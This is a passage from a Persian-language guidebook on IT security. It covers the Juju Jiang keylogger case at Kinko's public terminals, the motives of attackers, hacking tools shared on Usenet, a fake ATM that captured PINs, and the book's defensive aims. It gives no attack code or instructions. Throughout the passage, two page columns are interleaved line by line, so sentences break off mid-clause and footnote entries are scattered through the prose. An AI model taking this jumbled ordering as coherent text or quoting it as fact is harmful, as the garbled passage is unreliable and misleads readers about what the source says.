‫ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩ‪:‬‬ ‫ﻭﺿﻌﻴﺖ ﺳﻔﺎﺭﺷـﺎﺕ ﻳـﺎ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺑﺎﺷـﻨﺪ‪،‬‬
‫" ﺁﺳﻮﺷﻴﺘﺪ ﭘـﺮﺱ )ﻧﻴﻮﻳـﻮﺭﻙ( ‪ -‬ﺑـﺮﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜـﺴﺎﻝ‪،‬‬ ‫ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻘﺾ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺁﻧﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺴﻴﺎﺭ‬
‫‪٥٦‬‬
‫ﺟﻮﺟﻮ ﺟﻴﺎﻧﮓ‪ ٥٥‬ﺑﺪﻭﻥ ﺍﻃﻼ ﹺﻉ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫـﺎﻱ‬ ‫ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺯﻳﺎﻧﺒﺎﺭ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ‪ ٥٧‬ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫ﻧﻘﺾ ﺍﻧﺴﺠﺎﻡ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﺁﻧﻬﺎ ﺗﺎﻳﭗ ﻣﻲﻛﺮﺩﻧﺪ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﺮﺩ‪.‬‬ ‫‪ -‬ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﻪ ﻃﻮﺭ ﻣﺴﺘﻘﻴﻢ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ‬
‫ﺟﻴﺎﻧﮓ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺪﺍﻗﻞ ﭼﻬﺎﺭﺩﻩ‬ ‫ﻧﮕﺮﻓﺘﻪﺍﻳﺪ‪ ،‬ﻭﻟﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﻪ‬
‫ﻓﺮﻭﺷﮕﺎﻩ ﻛﻴﻨﻜﻮ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﻓﺸﺮﺩﻥ‬ ‫ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻳﺪ ﻣﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ ﻭ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺷﻤﺎ ﻧﻴﺰ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺍﮔـﺮ‬
‫‪52‬‬ ‫‪Web Server‬‬ ‫ﻼ ﻳﻚ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﺑﺎﺷـﻴﺪ ﺣـﻴﻦ ﺩﻭﺭﺓ‬ ‫ﻣﺜ ﹰ‬
‫‪53‬‬ ‫‪Authentication Tokens‬‬ ‫ﺑﺎﺯﻳﺎﺑﻲ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺧـﻮﺩ‬
‫‪54‬‬ ‫‪Denial of Access‬‬
‫‪55‬‬ ‫‪Juju Jiang‬‬ ‫ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ‪.‬‬
‫‪56‬‬ ‫‪Terminals‬‬
‫‪57‬‬ ‫‪Kinko's Stores‬‬
‫‪٣٩‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺩﻭﺭ ﺳﺎﺧﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬ ‫ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺭﺍ ﺛﺒﺖ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳـﻦ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺩﺭ ﻃـﻮﻝ‬
‫ﺟﺪﻳﺪ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻗﺪﺭﺕ ﺑﺨـﺸﻴﺪﻥ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﻟـﺬﺕ‬ ‫ﻓﻌﺎﻟﻴﺖ ﻳﻜﺴﺎﻟﺔ ﺧﻮﺩ ﺑﻴﺶ ﺍﺯ ‪ ۴۵۰‬ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫ﺑﺮﺩﻥ ﺍﺯ ﺍﻳﻦ ﺩﻧﻴﺎﻱ ﻧﻮﻳﻦ ﺑﻪ ﺭﻭﺷﻲ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤـﺌﻦ ﺍﺳـﺖ‪ .‬ﺩﺭ‬ ‫ﻋﺒــﻮﺭ ﺛﺒــﺖ ﻛــﺮﺩﻩ ﻭ ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳﺘﺮﺳــﻲ ﻭ ﺣﺘــﻲ‬
‫ﻳﻚ ﻛﻼﻡ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻫﺪﻑ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻌﺔ‬ ‫ﺑﺎﺯﻛﺮﺩﻥ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﺮﺧﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ‪.‬‬
‫ﺩﺭﻙ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻴﻖ ﺍﺯ ﻣﺎﻫﻴﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺟـﻮﺩ‬ ‫ﺍﻳﻦ ﭘﺮﻭﻧﺪﻩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳـﻞ ﺍﻳـﻦ ﻣـﺎﻩ ﭘـﺲ ﺍﺯ ﺩﺳـﺘﮕﻴﺮﻱ‬
‫ﺑﻪ ﻣﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﻧﻘﺎﻁ ﻗـﻮﺕ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﺟﻴﺎﻧﮓ ﻣﻨﺠﺮ ﺑﻪ ﺗﻌﻴﻴﻦ ﻣﺠﺎﺯﺍﺕ ﺑﺮﺍﻱ ﻭﻱ ﺷﺪ ﺧﻄﺮﻫﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻛـﺎﻓﻲﻧـﺖﻫـﺎ‪،‬‬
‫ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫـﺎ‪ ،‬ﻓﺮﻭﺩﮔﺎﻫﻬـﺎ ﻭ ﺩﻳﮕـﺮ ﻣﺆﺳـﺴﺎﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﺍﻧﮕﻴﺰﺓ ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺍﻣﻨﻴﺘﻲ ﭼﻴﺴﺖ؟‬
‫ﻣﻲﺳـﺎﺯﺩ‪ .‬ﻧﻴـﻞ ﻣﻬﺘـﺎ‪ ٥٨‬ﻣﻬﻨـﺪﺱ ﭘـﮋﻭﻫﺶ ﺩﺭ ﻣﺆﺳـﺴﺔ‬
‫ﺩﺭ ﺯﻧﺪﮔﻲ ﻭﺍﻗﻌﻲ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺟﻨﺎﻳﻲ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ٥٩‬ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ "ﻫﻨﮕـﺎﻡ‬
‫ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻳﻜﻲ ﺍﺯ ﺩﻻﻳﻞ ﻋﻤـﺪﻩ‪،‬‬ ‫ﺶ ﻋﺮﻓـﻲ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﻳﻚ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺩﺍﻧ ﹺ‬
‫ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﻓﺮﺩ ﺧﺮﺍﺑﻜﺎﺭ ﺍﺯ ﺷﺨﺼﻲ ﻛـﻪ ﻓﻜـﺮ ﻣـﻲﻛﻨـﺪ ﺑـﻪ ﺍﻭ‬ ‫ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﻭﺯﻣـﺮﻩ‬
‫ﺁﺳﻴﺒﻲ ﺭﺳﺎﻧﺪﻩ‪ ،‬ﻭ ﻳﺎ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﭘﻮﻝ ﺍﺳﺖ‪.‬‬ ‫ﻧﻈﻴﺮ ﺍﺗﺼﺎﻝ ﺑـﻪ ﻭﺏ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺎ ﻣـﺸﻜﻠﻲ ﻣﻮﺍﺟـﻪ‬
‫ﻧﻈﻴﺮ ﻫﻤﻴﻦ ﺗﺨﻠﻔﺎﺕ ﻧﻴﺰ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺗﺨﻠﻒ‬ ‫ﻧﺸﻮﻳﺪ ﺍﻣﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻫـﺮ ﻛـﺎﺭﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﻀﺎ ﺍﺯ ﺟﻨﺲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ‪ .‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻲ‬ ‫ﺣﺴﺎﺳﻴﺖ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ ﻓﻜـﺮ ﻛﻨﻴـﺪ"‪ .‬ﺟﻴﺎﻧـﮓ‬
‫ﺍﺯ ﺍﻓﺮﺍﺩ ‪ -‬ﻛﻪ ﻋﻤﻮﻣﹰﺎ "ﺧﺮﺍﺑﻜﺎﺭ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﻗﺎﺩﺭﻧـﺪ ﻭﺍﺭﺩ‬ ‫ﺯﻣﺎﻧﻲ ﺩﺳﺘﮕﻴﺮ ﺷﺪ ﻛﻪ ﻣﻄﺎﺑﻖ ﺳﻮﺍﺑﻖ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﺍﺩﮔـﺎﻩ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺮﺍﺩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺗﻔﺮﻳﺢ ﻭ ﺳﺮﮔﺮﻣﻲ ﺑﻪ‬ ‫ﺍﺯ ﻳﻜﻲ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺮﻭﻗﻪ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﻨﺪ ‪ -‬ﻳﻚ ﻣﺤﻴﻂ ﭼﺎﻟﺶ ﺑﺮﺍﻧﮕﻴﺰ ﺍﺳـﺖ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻬﺰ ﺑﻪ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ‪ GoToMyPC‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺑﻌﺒــﺎﺭﺕ ﺩﻳﮕــﺮ‪ ،‬ﺁﻧﻬــﺎ ﻗــﺪﺭﺕ ﻧﻔــﻮﺫ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ ﻛــﺎﺭﺑﺮﻱ‪،‬‬ ‫ﻛﺮﺩﻩ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺭﺍﻩ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻳﻚ ﺍﻓﺘﺨﺎﺭ ﺑﺮﺍﻱ ﺧﻮﺩ‬ ‫ﺩﻭﺭ ﻭ ﺍﺯ ﻫﺮ ﻣﻜﺎﻧﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ‪.‬‬
‫ﻣﻲﺩﺍﻧﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﺳﺖ‪.‬‬ ‫ﺷﺨــﺼﻲ ﻛــﻪ ﺑﺮﻧﺎﻣــﺔ ‪ GoToMyPC‬ﺭﻭﻱ ﺭﺍﻳﺎﻧــﺔ ﻭﻱ‬
‫ﻧﺼﺐ ﺷﺪﻩ ﺑـﻮﺩ ﺩﺭ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺟـﺮﻡ ﺩﺭ ﺧﺎﻧـﻪ ﺑـﻮﺩ ﻭ‬
‫ﻻ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ "ﺟﻨﺎﻳﺎﺕ ﺑﺪﻭﻥ ﻗﺮﺑﺎﻧﻲ" ﺑـﻪ‬ ‫ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬ ‫ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟﻪ ﺷﺪ ﻣﻜـﺎﻥﻧﻤـﺎﻱ ﺭﺍﻳﺎﻧـﺔ ﺍﻭ ﺭﻭﻱ ﺻـﻔﺤﻪ‬
‫ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺳﺘﺪﻻﻝ ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﻳﻚ ﺣﺴﺎﺏ‬ ‫ﺷﺮﻭﻉ ﺑﻪ ﺣﺮﻛﺖ ﻛﺮﺩ ﻭ ﻓﺎﻳﻠﻬﺎ ﺧﻮﺩ ﺑﻪ ﺧـﻮﺩ ﺑـﺎﺯ ﺷـﺪﻧﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻭﻟـﻲ ﭼﻴـﺰﻱ‬ ‫ﺳﭙﺲ ﺩﻳﺪ ﻛﻪ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑـﺎﺯ ﻭ ﻧـﺎﻡ ﺍﻭ ﺩﺭ ﻳـﻚ‬
‫ﺗﻐﻴﻴﺮ ﻧﻤﻲﻳﺎﺑﺪ ﻭ ﺩﺯﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ ﭼـﻪ ﺁﺳـﻴﺒﻲ ﺑـﻪ ﻛـﺴﻲ ﻭﺍﺭﺩ‬ ‫ﺳﺮﻭﻳﺲ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭﺝ ﺷـﺪ‪ .‬ﺟﻴﺎﻧـﮓ ﻛـﻪ ﻣﻨﺘﻈـﺮ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟ ﺩﺭ ﻭﺍﻗﻊ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺣﻘﻮﻗﻲ ﻭ ﭘﻴﺎﻣـﺪﻫﺎﻱ‬ ‫ﺻﺪﻭﺭ ﺣﻜﻢ ﺩﺍﺩﮔـﺎﻩ ﺍﺳـﺖ‪ ،‬ﻧﻬﺎﻳﺘـﹰﺎ ﺩﺭ ﭼﻬـﺎﺭﺩﻫﻢ ﻓﻮﺭﻳـﻪ‬
‫ﺍﻳﻨﻜﺎﺭ ﺗﻮﺟﻪ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﺣـﺴﺎﺱ ﻧـﺎﺍﻣﻨﻲ ﻗﺮﺑﺎﻧﻴﺎﻧـﺸﺎﻥ ﻛـﻪ‬ ‫‪ ۲۰۰۱‬ﺑﻪ ﻧﺼﺐ ﻛﺮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﻔﻲ ﺛﺒﺖﻛﻨﻨـﺪﺓ ﻛﻠﻴـﺪ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻲﺷﻮﺩ ﻧﻴـﺰ ﺍﻫﻤﻴﺘـﻲ ﻧﻤـﻲ ﺩﻫﻨـﺪ‪.‬‬ ‫‪٦٠‬‬
‫ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ﺍﻋﺘﺮﺍﻑ ﻛﺮﺩ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩﻱ ﻭﺍﺭﺩ‬
‫ﺧﺎﻧﺔ ﺷﻤﺎ ﺷﻮﺩ ﻭ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ‬ ‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎﻳﻲ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧﺎﻧـﻪ‬
‫ﻛﻨﺪ‪ .‬ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬ ‫ﻭ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻣﻲﺑﺎﺷﺪ ﻭ ﻟﺬﺍ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻌﻲ‬
‫ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﻣﺎﻧﻨـﺪ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﻧﺘـﺎﻳﺞ ﺣﻤـﻼﺕ‪،‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻧﺎﻗﻀﺎﻥ ﺍﻣﻨﻴﺖ ﻛﻤـﻚ ﺯﻳـﺎﺩﻱ ﻣـﻲ ﻛﻨـﺪ‪.‬‬ ‫ﺭﻭﺷــﻬﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺭﺍﻳﺎﻧــﻪﻫــﺎ‪ ،‬ﺷــﺒﻜﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎ‪ ،‬ﻭ ﻧﻴــﺰ‬
‫ﺑﺮﺧــﻲ ﺍﺯ ﺧﺮﺍﺑﻜﺎﺭﻫــﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧﻔــﻮﺫ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﻪ‬ ‫ﻲ‬
‫ﻱ ﺍﻣﻨﻴﺘـ ﹺ‬ ‫ﻱ ﺍﺳﺘﺮﺍﺗﮋ ﹺ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯ ﹺ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻢ ﺍﻣﻜﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﺑﺮﺧﻲ‬ ‫ﻣﺆﺛﺮ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﻫـﺪﻑ ﻧﻬـﺎﻳﻲ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﻻ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﻣﻲﺩﻫﺪ‪ .‬ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺧﺒﺮﻱ ‪ Usenet‬ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﻬﻮﺭ ﻫﺴﺘﻨﺪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ‬ ‫‪58‬‬ ‫‪Neel Mehta‬‬
‫ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺑـﺰﺍﺭ ﺭﺍ ﺍﺯ ﺁﻧﺠـﺎ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﻭ ﻣـﻮﺭﺩ‬ ‫‪59‬‬ ‫‪Internet Security Systems‬‬
‫‪60‬‬ ‫‪Associated Press Bulletin, July 23, 2003‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠‬‬

‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﮔـﺮﻓﺘﻦ ﭘـﻮﻝ ﺍﺯ ﺍﻳـﻦ ﻣﺎﺷـﻴﻦ ﻛـﺎﺭﺕ ﻭ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﻣﻤﻜـﻦ‬
‫ﺷﻤﺎﺭﺓ ﺭﻣﺰ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﺮﺩﻧﺪ‪ ،‬ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﺟﻌﻠﻲ ﺑﺎ ﺫﺧﻴـﺮﺓ‬ ‫ﺍﺳﺖ ﺑﺪﻭﻥ ﺧﻄﺮ ﺑﺎﺷـﻨﺪ‪ ،‬ﻫﺮﮔـﺰ ﻛـﺴﻲ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ ﺁﺛـﺎﺭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻌﺪﻱ ﺑﻪ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺭﺍ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺩﻗﻴﻘـﹰﺎ ﭼﻴـﺴﺖ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳـﻦ‬
‫ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﭼﻮﻥ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻗﻌﻲ ﺍﻋﺘﺒـﺎﺭﻱ‬ ‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍ ﹺﺭ‬
‫ﻧﺪﺍﺷﺖ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻣﺎﻟﻲ ﻧﺒﻮﺩ‪ .‬ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﺩﻳﮕـﺮ‬ ‫ﺑﻪﺍﺻﻄﻼﺡ ﺑﻲﺧﻄﺮ ﺑﺘﻮﺍﻥ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻛـﻪ‬
